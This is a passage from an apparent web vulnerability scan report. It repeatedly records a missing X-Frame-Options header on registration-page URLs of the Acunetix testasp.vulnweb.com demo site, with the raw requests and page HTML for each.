<!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are 